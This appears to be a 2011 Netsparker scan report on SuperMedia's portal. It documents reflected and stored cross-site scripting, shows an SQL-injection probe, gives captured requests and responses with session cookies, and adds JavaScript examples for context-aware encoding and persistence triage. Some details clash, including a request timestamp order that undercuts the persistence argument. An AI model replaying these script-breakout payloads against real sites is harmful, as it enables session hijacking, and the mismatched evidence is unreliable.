No such flow definition with id &#039;&#039;AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >
<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
..
Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting its HTML on the fly to steal the user's credentials. It happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, it still lets an attacker hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions
  • Changing the look of the page within the victim's browser
  • Mounting a successful phishing attack
  • Intercepting data and performing man-in-the-middle attacks

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be encoded according to its output format and location. Typically the output location is HTML; where the output is HTML, ensure that all active content is neutralised before it is sent to the browser. Where the output lands inside a JavaScript string, as the exception message does in the inline SiteCatalyst script of the captured response, it must be escaped for that context as well: the response entity-encodes the message in the page body but writes it raw into s.prop7, so the </script> inside the input ends the script element and what follows is parsed as markup.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list and output-encoding libraries available for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.
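The two reflection points in the captured error page, rebuilt side by side as an added example (this is not code from the scan report or from the SuperMedia portal): a vulnerable renderer that writes the exception message raw into the inline s.prop7 string while entity-encoding it in the body, exactly the pattern the response shows, and a hardened renderer that encodes each sink for its own context. The probe string, the error text and the s.prop7 variable are taken from the report; the function names, the page skeleton and the encoders are this example's own.

```javascript
// Added example, not code from the scan report or the SuperMedia portal.
// It rebuilds the two reflection points seen in the captured error page
// (the inline SiteCatalyst "s.prop7" string and the entity-encoded body
// text) as a vulnerable renderer and a hardened one. The probe, the error
// text and the s.prop7 name come from the report; everything else is
// this example's own construction.

// Netsparker's probe, decoded from the query string shown in the report.
const PROBE = `'"--></style></script><script>netsparker(0x00023F)</script>`;

// HTML text context: neutralise the characters that can open markup or
// terminate an attribute value.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: escape everything outside a small
// allow-list as \xHH / \uHHHH. Escaping "<" and "/" matters as much as the
// quotes: the HTML parser looks for "</script" in the raw script text
// before the JavaScript engine ever decodes an escape sequence.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._-]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Vulnerable: the exception text is dropped raw into a JS string inside an
// inline <script>, as the captured response does. The body line below it
// is entity-encoded, which is why only the script line is exploitable.
function renderErrorVulnerable(flowId) {
  const message = `No such flow definition with id '${flowId}' found`;
  return [
    `<script type="text/javascript">s.prop7="${message}";</script>`,
    `<h4>An Error has occurred in this application.</h4>`,
    `<div>${encodeForHtml(message)}</div>`,
  ].join("\n");
}

// Hardened: same page, but each sink gets the encoder for its own context.
function renderErrorHardened(flowId) {
  const message = `No such flow definition with id '${flowId}' found`;
  return [
    `<script type="text/javascript">s.prop7="${encodeForJsString(message)}";</script>`,
    `<h4>An Error has occurred in this application.</h4>`,
    `<div>${encodeForHtml(message)}</div>`,
  ].join("\n");
}

// Count <script and </script tokens. The template itself contributes
// exactly two; anything beyond that came from the reflected input.
function countScriptTags(html) {
  return (html.match(/<\/?script/gi) || []).length;
}

// Round-trip check for the JS encoder: once the literal is evaluated the
// script must read back the exact original message, nothing lost.
function decodeJsLiteral(encoded) {
  return new Function(`return "${encoded}";`)();
}

console.log(countScriptTags(renderErrorVulnerable(PROBE)), "script tokens in the vulnerable page");
console.log(countScriptTags(renderErrorHardened(PROBE)), "script tokens in the hardened page");
```

The allow-list encoder is deliberately stricter than a quote-only escape: a value that is safe as a JavaScript string but still contains a literal `</script` will be cut off by the HTML parser, which tokenises the script element before the JavaScript engine sees it.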

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

https://www.supermedia.com/spportal/spportalFlow.do?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter: '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00029B)%3C/script%3E (sent as the parameter name with an empty value, as the request below shows)
Type: GET, Query Based (QUERYSTRING)
Value: '"--></style></script><script>alert(0x00029B)</script>

Request

GET /spportal/spportalFlow.do?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00029B)%3C/script%3E HTTP/1.1
Referer: http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 5797

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/myaccount.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this request are: map[''"--></style></script><script>netsparker(0x00029B)</script>' -> '']";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
<!-- Header Start -->
<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->
<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->
<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>
<!-- Atlas Code End -->
<div id="header">
<div id="top">
<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>
<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>
<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">
<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>
</ul>
</div>
</div>
</div>
<!-- Roll-over navigation menus -->


<!-- Header End -->
</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Unable to extract the flow definition id parameter: make sure the client provides the &#039;_flowId&#039; parameter as input or set the &#039;defaultFlowId&#039; property; the parameters provided in this request are: map[&#039;&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00029B)&lt;/script&gt;&#039; -&gt; &#039;&#039;]
</div>

</div>
</div>
<div >
<!-- Footer Start -->
<div id="footer" >
<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>
<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-retail" title="Local Retailers">Local Retailers</a></li>
<li><a href="https://www.supermedia.com/client-solutions/web-based-business" title="Web Businesses">Web Businesses</a></li>
<li><a href="https://www.supermedia.com/client-solutions/national-brand-agencies" title="National Brands & Agencies">National Brands &amp; Agencies</a></li>
<li><a href="https://www.supermedia.com/advertising-goals" title="Advertising Goals...">Advertising Goals...</a></li>
<li><a href="https://www.supermedia.com/client-solutions/share-the-wealth" title="Share the Wealth">Share the Wealth</a></li>
..
Permanent Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting its HTML on the fly to steal the user's credentials. It happens because input entered by the user has been interpreted as HTML/JavaScript/VBScript by the browser.

Permanent means that the attack is stored in the back-end system. In a reflected XSS attack the attacker has to deliver the crafted link to each victim (for example by e-mail), but in a permanent XSS the attacker can inject the payload once and wait for users to visit the affected page. As soon as someone views the page, the stored payload is executed in their browser.

XSS targets the users of the application instead of the server. Although this is a limitation, it still lets an attacker hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.
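What the captured evidence supports deserves a closer look before this verdict is accepted. The identification request sent a different _flowId value (response.write(268409241-22)'), and its response shows that value, entity-encoded, in the visible error text; yet the s.prop7 string in the same response's inline SiteCatalyst script still carries the earlier injection marker netsparker(0x00023F). The marker therefore survived beyond the request that injected it, which is what the scanner calls permanent. Both requests, however, carried the same JSESSIONID, so the evidence only proves persistence within one session; whether the last exception message is kept per session or globally needs a retest from a fresh session. The helper below is an added example, not part of the report: it encodes that triage over constructed response bodies modelled on the report's shape, with the cookie header and the s.prop7 fragment taken from the capture and all function names this example's own.

```javascript
// Added example, not part of the scan report: triage for the "Permanent"
// verdict. The cookie header and the s.prop7 fragment are modelled on the
// captured requests and responses; the bodies are constructed stand-ins.

// Marker Netsparker injected into _flowId in the injection request.
const MARKER = "netsparker(0x00023F)";

// Cookie header both captured requests carried (same JSESSIONID).
const REPORT_COOKIE =
  "JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U";

// Constructed: the shape of the identification response. The inline
// SiteCatalyst string still carries the earlier marker while the visible
// body shows the identification request's own _flowId value.
const IDENTIFICATION_BODY = [
  `<script type="text/javascript">s.prop7="No such flow definition with id ''"--></style></script><script>${MARKER}</script>' found";</script>`,
  `<h4>An Error has occurred in this application.</h4>`,
  `No such flow definition with id &#039;response.write(268409241-22)&#039;&#039; found`,
].join("\n");

// Constructed: what a response to a fresh, unrelated session would look
// like if the message were only kept per session.
const FRESH_SESSION_BODY = [
  `<script type="text/javascript">s.prop7="";</script>`,
  `<h4>An Error has occurred in this application.</h4>`,
  `No such flow definition with id &#039;probe&#039; found`,
].join("\n");

// Pull the JSESSIONID value out of a raw Cookie header line.
function sessionIdFromCookie(cookieHeader) {
  const m = /(?:^|;\s*)JSESSIONID=([^;]+)/.exec(cookieHeader || "");
  return m ? m[1] : null;
}

// Is the marker inside an open <script> element? That is the executable
// sink; an entity-encoded copy (&lt;script&gt;...) never matches the raw
// marker at all and so does not count as a hit.
function inScriptContext(body, marker) {
  const at = body.indexOf(marker);
  if (at < 0) return false;
  const before = body.slice(0, at).toLowerCase();
  return before.lastIndexOf("<script") > before.lastIndexOf("</script>");
}

// What the follow-up response proves about the injected marker:
//   "reflected"      - not echoed by a later request at all
//   "stored-session" - echoed, but the follow-up reused the injecting session
//   "stored"         - echoed to a request that carried a different session
function classifyPersistence(marker, injectionCookie, followupCookie, followupBody) {
  if (!followupBody.includes(marker)) return "reflected";
  const a = sessionIdFromCookie(injectionCookie);
  const b = sessionIdFromCookie(followupCookie);
  return a && b && a !== b ? "stored" : "stored-session";
}

// What the captured pair supports, and what the fresh-session retest would
// say if the message turned out to be session-scoped.
function triageReport() {
  return {
    fromReport: classifyPersistence(MARKER, REPORT_COOKIE, REPORT_COOKIE, IDENTIFICATION_BODY),
    executable: inScriptContext(IDENTIFICATION_BODY, MARKER),
    freshSession: classifyPersistence(MARKER, REPORT_COOKIE, "JSESSIONID=0000000000000000000000000000000.app6-a1", FRESH_SESSION_BODY),
  };
}

console.log(triageReport());
```

A "stored-session" result still matters: the session cookie here is shared across the whole portal, so any page in that session that renders the last exception into s.prop7 executes the payload, but it only reaches the user who was made to send the injecting request. A "stored" result from a different session is what turns the finding into a worm or defacement vector in the sense the Impact list describes.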

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
  • User session-sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be encoded according to its output format and location. Typically the output location is HTML; where the output is HTML, ensure that all active content is neutralised before it is sent to the browser. Where the output lands inside a JavaScript string, as the stored exception message does in the inline SiteCatalyst script of the identification response, it must be escaped for that context as well: the response entity-encodes the message in the page body but writes it raw into s.prop7, so the </script> inside the input ends the script element and what follows is parsed as markup.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list and output-encoding libraries available for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

https://www.supermedia.com/spportal/spportalFlow.do?_flowId=response.write(268409241-22)%27

Injection URL

https://www.supermedia.com/spportal/spportalFlow.do?_flowId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00023F)%3C/script%3E

Injection Request

GET /spportal/spportalFlow.do?_flowId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00023F)%3C/script%3E HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Identification Request

GET /spportal/spportalFlow.do?_flowId=response.write(268409241-22)%27 HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:33 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6147


Identification Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:32 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6294

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="http://www.supermedia.com/spportal/forgotPwd.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="No such flow definition with id ''"--></style></script><script>netsparker(0x00023F)</script>' found; the flows available are: array<String>['accountAdmin-flow', 'accountreg-flow', 'businessprofile-flow', 'client-consolidation-flow', 'contactus-flow', 'coupon-flow', 'forgotpassword-edit-flow', 'funding-flow', 'lead-maintain-flow', 'listingOrderSummary-flow', 'login-flow', 'loginact-flow', 'maintaincreditcard-flow', 'microsite-flow', 'myaccount-contactinfo-edit-flow', 'myaccount-domains-flow', 'myaccount-email-edit-flow', 'myaccount-emails-flow', 'myaccount-flow', 'myaccount-password-edit-flow', 'myaccount-websites-flow', 'onlinecc-flow', 'ordersummary-flow', 'paypercall-flow', 'pfc-businessprofile-flow', 'pfc-flow', 'pfp-adDesign-flow', 'pfp-categories-flow', 'pfp-elp-flow', 'pfp-geo-flow', 'pfp-keywords-flow', 'photos-flow', 'ppc-advsearch-flow', 'ppc-bidding-flow', 'ppc-create-flow', 'ppc-fullservice-flow', 'ppc-maintain-flow', 'repmanagement-flow', 'reviews-flow', 'sclicks-maintain-flow', 'sharethewealth-flow', 'temporary-password-flow', 'webhosting-addons-flow', 'webhosting-design-flow', 'webhosting-domainnames-flow', 'webhosting-email-products-flow', 
'webhosting-websites-flow']";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
